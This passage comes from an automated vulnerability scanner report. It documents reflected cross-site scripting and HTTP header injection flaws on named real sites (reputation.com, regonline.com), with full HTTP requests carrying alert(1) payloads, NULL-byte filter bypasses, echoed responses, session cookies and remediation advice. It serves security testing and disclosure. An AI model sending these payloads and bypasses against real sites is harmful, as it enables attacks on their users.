Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /itemAdded?bundleAdded=1862 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; __utmv=; repdef_ref_code=RCPT2; _bizo_cksm_crc32=18E06BDE; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.10.7.1303227203968

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 15:40:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 15:40:44 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 127921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<select name="switchPlan[af3ef"><script>alert(1)</script>03fec696ae4][3594]" id="promoscaleSelect_3594" entityId="af3ef">
...[SNIP]...

3.3. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/ajax_updateShoppingCart.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the HTML document as plain text between tags at the URL /services/ajax_updateShoppingCart.php. The payload 93b60<x%20style%3dx%3aexpression(alert(1))>b4c28804027 was submitted in the entityId parameter. This input was returned as 93b60<x style=x:expression(alert(1))>b4c28804027 in a subsequent request for the URL /services/ajax_updateShoppingCart.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=93b60<x%20style%3dx%3aexpression(alert(1))>b4c28804027 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /services/ajax_updateShoppingCart.php HTTP/1.1
Host: www.reputation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan)
Connection: close
Cookie: region=USA; abg_products/default6_d=products%2Fdefault6_e; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A3%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A3%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A3; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmv=; abglink_repdef_table_test=default; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; lang=en; country=USA%2C69.54.6.26; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=18E06BDE; retargeter=generic; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; PHPSESSID=erpgsq3t7f3s77fo4055upbap3; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; repdef_ref_code=RCPT2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; uuid=4dada9a870f2b; __utmc=1; __utmb=1.19.9.1303227765506;

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 17:02:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 17:02:50 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 7781
Connection: close
Content-Type: text/html; charset=UTF-8

{"totalPrice":2637180,"isCartEmpty":false,"cartItems":{"0":{"bundles":[1862]},"3728a9cb87876df5a8e32444":{"bundles":[1862]},"de439\"><a>4789549632d":{"bundles":[1862]},"af3ef\"><script>alert(1)<\/scri
...[SNIP]...
<a>9112a538db":{"bundles":[1862]},"93b60<x style=x:expression(alert(1))>b4c28804027":{"bundles":[1862]}},"entities":[]}

3.4. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/ajax_updateShoppingCart.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/panelrenderer.php is copied into the HTML document as plain text between tags at the URL /services/ajax_updateShoppingCart.php. The payload d595f<img%20src%3da%20onerror%3dalert(1)>d75c8d6b1c5 was submitted in the entityId parameter. This input was returned as d595f<img src=a onerror=alert(1)>d75c8d6b1c5 in a subsequent request for the URL /services/ajax_updateShoppingCart.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=d595f<img%20src%3da%20onerror%3dalert(1)>d75c8d6b1c5&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Request 2

GET /services/ajax_updateShoppingCart.php?method=addPlan&planId=2800&entityId=0 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_np_stats=753%3D146%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A3%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A3%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A3; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.32.4.1303178015591

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:58:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 01:58:16 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 155
Content-Type: text/html; charset=UTF-8

{"totalPrice":27840,"isCartEmpty":false,"cartItems":{"0":{"plans":[2800]},"d595f<img src=a onerror=alert(1)>d75c8d6b1c5":{"bundles":[1862]}},"entities":[]}

3.5. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/ajax_updateShoppingCart.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the HTML document as plain text between tags at the URL /services/ajax_updateShoppingCart.php. The payload 10dae<img%20src%3da%20onerror%3dalert(1)>2f4934042d5 was submitted in the entityId parameter. This input was returned as 10dae<img src=a onerror=alert(1)>2f4934042d5 in a subsequent request for the URL /services/ajax_updateShoppingCart.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=10dae<img%20src%3da%20onerror%3dalert(1)>2f4934042d5 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=0 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 15:42:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 15:42:10 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 2282

{"totalPrice":771420,"isCartEmpty":false,"cartItems":{"0":{"bundles":[1862]},"3728a9cb87876df5a8e32444":{"bundles":[1862]},"de439\"><a>4789549632d":{"bundles":[1862]},"af3ef\"><script>alert(1)<\/scrip
...[SNIP]...
<a b=c>81c905857bd":{"bundles":[1862]},"10dae<img src=a onerror=alert(1)>2f4934042d5":{"bundles":[1862]}},"entities":[]}

3.6. http://www.reputation.com/services/panelrenderer.php [entityId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/panelrenderer.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/panelrenderer.php is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks at the URL /services/panelrenderer.php. The payload %00c3192"><x%20style%3dx%3aexpression(alert(1))>ea6b0850b6f was submitted in the entityId parameter. This input was returned as c3192"><x style=x:expression(alert(1))>ea6b0850b6f in a subsequent request for the URL /services/panelrenderer.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=%00c3192"><x%20style%3dx%3aexpression(alert(1))>ea6b0850b6f&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Request 2

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=0&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:59:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:59:59 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 104817
Content-Type: text/html; charset=UTF-8

<input type="hidden" id="_isCartEmpty" value=""/>
<div id="purchaseTop" class="left">
<div id="shoppingCartTable">

<div class="entityNameBar"><h2 class
...[SNIP]...
<select name="switchPlan[.c3192"><x style=x:expression(alert(1))>ea6b0850b6f][3594]" id="promoscaleSelect_3594" entityId=".c3192">
...[SNIP]...

4. HTTP header injection  previous  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Remediation background

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da698%00%0d%0a3fd008c10bf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /marketing/event/features/?da698%00%0d%0a3fd008c10bf=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:40 GMT
Location: http://www.regonline.com/__features/?da698
3fd008c10bf
=1:
Connection: close
Content-Length: 0


4.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/pricing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2d40%00%0d%0ab15c88885b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /marketing/event/pricing/?a2d40%00%0d%0ab15c88885b1=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__pricing/?a2d40
b15c88885b1
=1:
Connection: close
Content-Length: 0


4.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/testimonials/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8fca8%0d%0acb9e5a58209 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /marketing/event/testimonials/?8fca8%0d%0acb9e5a58209=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
